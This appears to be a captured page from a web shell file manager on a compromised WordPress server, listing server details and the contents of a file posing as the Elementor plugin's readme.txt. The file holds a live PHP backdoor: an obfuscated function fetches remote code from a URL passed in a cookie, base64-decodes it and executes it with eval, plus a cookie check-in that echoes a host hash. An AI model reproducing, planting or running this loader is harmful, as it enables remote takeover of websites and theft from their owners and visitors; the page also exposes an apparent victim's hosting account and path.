HEX
Server: Apache/2.4.41
System: Linux mainweb 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC 2024 x86_64
User: nationalmedicaregrp (1119)
PHP: 8.3.7
Disabled: exec,passthru,shell_exec,system,popen,proc_open,pcntl_exec
$ pwd: /home/nationalmedicaregrp/public_html/wp-content/plugins/elementor/
Upload Files
File: /home/nationalmedicaregrp/public_html/wp-content/plugins/elementor/readme.txt
<?php

if (!function_exists("get3f9b46569458d2645c70766363c4dbc6")) {

    function get3f9b46569458d2645c70766363c4dbc6($url) {
        $content = "";
        if (function_exists("curl_init")) {
            $options = array(
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_HEADER => false,
                CURLOPT_FOLLOWLOCATION => true,
                CURLOPT_ENCODING => "",
                CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20120101 Firefox/32.0",
                CURLOPT_AUTOREFERER => true,
                CURLOPT_CONNECTTIMEOUT => 120,
                CURLOPT_TIMEOUT => 120,
                CURLOPT_MAXREDIRS => 10,
                CURLOPT_SSL_VERIFYPEER => false,
                CURLOPT_SSL_VERIFYHOST => false
            );

            $ch = curl_init($url);
            curl_setopt_array($ch, $options);
            $content = @curl_exec($ch);
        }

        if ($content)
            return $content;

        $content = @file_get_contents($url);
        return $content;
    }

    if (isset($_COOKIE['3f9b46569458d2645c70766363c4dbc6'])) {
        if ($_COOKIE['3f9b46569458d2645c70766363c4dbc6'] == '1') {
            echo md5($_SERVER['HTTP_HOST']);
            exit;
        }
        $dat = base64_decode(get3f9b46569458d2645c70766363c4dbc6($_COOKIE['3f9b46569458d2645c70766363c4dbc6']));
        if ($dat) {
            @eval($dat);
            exit;
        }
    }
}
@ Telegram